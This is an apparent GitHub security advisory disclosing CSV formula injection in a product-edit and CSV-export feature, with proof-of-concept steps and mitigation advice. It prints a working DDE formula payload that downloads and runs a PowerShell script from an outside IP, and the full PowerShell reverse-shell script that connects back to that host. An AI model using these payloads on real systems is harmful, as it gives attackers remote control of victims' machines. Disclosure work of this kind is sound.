GHSA-74rg-6f92-g6wx

Summary

Description: CSV Injection or Formula Injection is a security vulnerability that occurs when malicious content is inserted into a CSV (Comma-Separated Values) file, which is then opened in a spreadsheet application like Microsoft Excel. This attack exploits the way spreadsheet software automatically interprets certain text patterns as formulas or commands, rather than plain text.

Details

A basic test for CSV Injection is using SUM() to add two numbers or open calc.exe​ using​ command: =cmd|' /C calc'!A0​

The same method can be used to run arbitrary code on the victim's machine. For example the below code will download and execute a malicious script to create a reverse TCP connection to the attacker's machine. Payload:

This is our payload and will be used in the vulnerable field during exploitation

    =cmd|' /C powershell Invoke-WebRequest
    "http://52.172.182.242:7000/shell.ps1" -OutFile "$env:Temp\shell.ps1";
    powershell -ExecutionPolicy Bypass -File "$env:Temp\shell.ps1"'!A1​

shell.ps1:

    $client = New-Object System.Net.Sockets.TCPClient('52.172.182.242',8000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()​

PoC:

1. Go to any product and click on Edit
2. Add the above discussed payload in any field that accept text for e.g. Product Number field.
3. Quick Export -> Select CSV, Open the csv, the formula will get executed during opening.

This could be injected by admin or any user that has privilege to edit products. Also the CSRF Injection reported at product edit feature can be used as an attack vector to add such payloads.

Please note that if this is replicated on version starting from Office 2021: Follow these steps: Go to File > Options > Trust Center > Trust Center Settings > External Content​ -> Enable Dynamic Data Exchange Server Launch". This is due to Office 2021 and Microsoft 365 have DDE disabled by default for enhanced security.

Platform Details: Replicated this on Office 2021 on Windows 11. POC video link: https://drive.proton.me/urls/3TP1QEMXNC#2PAy7OkVqdP3

Impact

When the victim opens the CSV, the injected formula which fetches a reverse shell script written in Powershell from attacker's server and executes it. This creates a reverse shell connection from victim's device to attacker's allowing an attacker to perform any action on the victim's device.

Recommendation:

• Avoid starting values with Equals sign (=), Plus sign (+), Minus sign (-), At symbol (@), Tab (0x09), Carriage return (0x0D).
• Sanitize the vulnerable field using regex or standard libraries.
• Wrap the value around double quotes for fields that cannot be sanitized for some reason so that the value is considered as string instead of formula.